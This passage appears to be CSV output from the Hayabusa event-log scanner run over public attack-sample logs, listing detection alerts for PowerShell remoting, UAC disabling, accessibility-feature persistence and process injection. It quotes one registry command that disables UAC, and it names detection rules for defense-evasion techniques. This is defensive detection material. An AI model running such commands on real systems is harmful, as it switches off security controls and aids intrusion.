SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 22:10:13.760 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx +2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: 
SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,rules/sigma/registry_event/win_re_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-17 01:08:30.516 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: 
DFAE8213-8AFE-5CDD-0000-001035B90A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 
+09:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 
365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
